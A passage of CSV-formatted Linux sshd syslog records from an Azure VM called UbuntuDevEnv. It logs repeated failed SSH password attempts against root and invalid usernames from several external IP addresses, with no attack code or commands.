+9967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:41,UbuntuDevEnv,2019-06-25 22:51:41,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 7081 ssh2 [preauth],50691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,7081,,
+9968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:41,UbuntuDevEnv,2019-06-25 22:51:41,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 7081: Too many authentication failures [preauth],50691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,7081,,
+9969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:47,UbuntuDevEnv,2019-06-25 22:51:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:48,UbuntuDevEnv,2019-06-25 22:51:47,auth,UbuntuDevEnv,info,Invalid user wang from 152.250.252.179 port 60900,50786,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wang,152.250.252.1,60900,,
+9971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:48,UbuntuDevEnv,2019-06-25 22:51:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50786,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:48,UbuntuDevEnv,2019-06-25 22:51:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,50786,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:50,UbuntuDevEnv,2019-06-25 22:51:49,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 20210 ssh2,50772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20210,,
+9974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:50,UbuntuDevEnv,2019-06-25 22:51:49,auth,UbuntuDevEnv,info,Failed password for invalid user wang from 152.250.252.179 port 60900 ssh2,50786,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wang,152.250.252.1,60900,,
+9975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:50,UbuntuDevEnv,2019-06-25 22:51:50,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 60900:11: Bye Bye [preauth],50786,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,60900,,
+9976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:50,UbuntuDevEnv,2019-06-25 22:51:50,auth,UbuntuDevEnv,info,Disconnected from invalid user wang 152.250.252.179 port 60900 [preauth],50786,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wang,152.250.252.1,60900,,
+9977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:53,UbuntuDevEnv,2019-06-25 22:51:52,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 20210 ssh2,50772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20210,,
+9978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:01,UbuntuDevEnv,2019-06-25 22:51:58,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 20210 ssh2],50772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20210,,
+9979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:02,UbuntuDevEnv,2019-06-25 22:52:01,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 20210 ssh2,50772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20210,,
+9980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:05,UbuntuDevEnv,2019-06-25 22:52:04,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:05,UbuntuDevEnv,2019-06-25 22:52:04,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 20210 ssh2 [preauth],50772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20210,,
+9982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:05,UbuntuDevEnv,2019-06-25 22:52:04,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 20210 ssh2,50772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,20210,,
+9983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:05,UbuntuDevEnv,2019-06-25 22:52:04,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 20210: Too many authentication failures [preauth],50772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,20210,,
+9984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:05,UbuntuDevEnv,2019-06-25 22:52:04,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,50772,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:06,UbuntuDevEnv,2019-06-25 22:52:06,auth,UbuntuDevEnv,info,Invalid user sinusbot from 77.232.128.87 port 37983,50853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,77.232.128.8,37983,,
+9986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:06,UbuntuDevEnv,2019-06-25 22:52:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:06,UbuntuDevEnv,2019-06-25 22:52:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,50853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+9988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:07,UbuntuDevEnv,2019-06-25 22:52:07,auth,UbuntuDevEnv,info,Invalid user sr from 178.62.54.79 port 56610,50865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sr,178.62.54.7,56610,,
+9989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:07,UbuntuDevEnv,2019-06-25 22:52:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:07,UbuntuDevEnv,2019-06-25 22:52:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,50865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:09,UbuntuDevEnv,2019-06-25 22:52:08,auth,UbuntuDevEnv,info,Failed password for invalid user sinusbot from 77.232.128.87 port 37983 ssh2,50853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,77.232.128.8,37983,,
+9992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:09,UbuntuDevEnv,2019-06-25 22:52:08,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 37983:11: Bye Bye [preauth],50853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,37983,,
+9993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:09,UbuntuDevEnv,2019-06-25 22:52:08,auth,UbuntuDevEnv,info,Disconnected from invalid user sinusbot 77.232.128.87 port 37983 [preauth],50853,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,77.232.128.8,37983,,
+9994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:09,UbuntuDevEnv,2019-06-25 22:52:09,auth,UbuntuDevEnv,info,Failed password for invalid user sr from 178.62.54.79 port 56610 ssh2,50865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sr,178.62.54.7,56610,,
+9995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:09,UbuntuDevEnv,2019-06-25 22:52:09,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 56610:11: Bye Bye [preauth],50865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,56610,,
+9996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:09,UbuntuDevEnv,2019-06-25 22:52:09,auth,UbuntuDevEnv,info,Disconnected from invalid user sr 178.62.54.79 port 56610 [preauth],50865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sr,178.62.54.7,56610,,
+9997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:15,UbuntuDevEnv,2019-06-25 22:52:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:17,UbuntuDevEnv,2019-06-25 22:52:17,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 33362 ssh2,50857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,33362,,
+9999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:34,UbuntuDevEnv,2019-06-25 22:52:33,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.175 port 33362 ssh2],50857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,33362,,
+10000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:34,UbuntuDevEnv,2019-06-25 22:52:33,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:34,UbuntuDevEnv,2019-06-25 22:52:33,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 33362 ssh2 [preauth],50857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,33362,,
+10002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:34,UbuntuDevEnv,2019-06-25 22:52:33,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,50857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+10003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:34,UbuntuDevEnv,2019-06-25 22:52:33,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 33362: Too many authentication failures [preauth],50857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,33362,,
+10004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:37,UbuntuDevEnv,2019-06-25 22:52:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50966,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:39,UbuntuDevEnv,2019-06-25 22:52:39,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 49801 ssh2,50966,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,49801,,
+10006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:51,UbuntuDevEnv,2019-06-25 22:52:50,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 218.92.0.175 port 49801 ssh2],50966,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,49801,,
+10007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:51,UbuntuDevEnv,2019-06-25 22:52:51,auth,UbuntuDevEnv,info,Invalid user edward from 139.199.113.140 port 57030,51015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edward,139.199.113.1,57030,,
+10008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:51,UbuntuDevEnv,2019-06-25 22:52:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,51015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+10009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:51,UbuntuDevEnv,2019-06-25 22:52:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:53,UbuntuDevEnv,2019-06-25 22:52:53,auth,UbuntuDevEnv,info,Failed password for invalid user edward from 139.199.113.140 port 57030 ssh2,51015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edward,139.199.113.1,57030,,
+10011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:54,UbuntuDevEnv,2019-06-25 22:52:53,auth,UbuntuDevEnv,info,Disconnected from invalid user edward 139.199.113.140 port 57030 [preauth],51015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edward,139.199.113.1,57030,,
+10012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:54,UbuntuDevEnv,2019-06-25 22:52:53,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 57030:11: Bye Bye [preauth],51015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,57030,,
+10013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:54,UbuntuDevEnv,2019-06-25 22:52:53,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,50966,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+10014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:54,UbuntuDevEnv,2019-06-25 22:52:53,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 49801 ssh2,50966,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,49801,,
+10015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:54,UbuntuDevEnv,2019-06-25 22:52:53,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 49801 ssh2 [preauth],50966,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,49801,,
+10016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:54,UbuntuDevEnv,2019-06-25 22:52:53,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50966,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:54,UbuntuDevEnv,2019-06-25 22:52:53,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 49801: Too many authentication failures [preauth],50966,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,49801,,
+10018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:57,UbuntuDevEnv,2019-06-25 22:52:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:52:59,UbuntuDevEnv,2019-06-25 22:52:58,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 61403 ssh2,51038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,61403,,
+10020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:02,UbuntuDevEnv,2019-06-25 22:53:01,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 61403 ssh2,51038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,61403,,
+10021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:13,UbuntuDevEnv,2019-06-25 22:53:12,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:13,UbuntuDevEnv,2019-06-25 22:53:12,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 218.92.0.175 port 61403 ssh2],51038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,61403,,
+10023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:13,UbuntuDevEnv,2019-06-25 22:53:12,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 61403 ssh2 [preauth],51038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,61403,,
+10024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:13,UbuntuDevEnv,2019-06-25 22:53:12,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 61403: Too many authentication failures [preauth],51038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,61403,,
+10025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:53:13,UbuntuDevEnv,2019-06-25 22:53:12,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,51038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
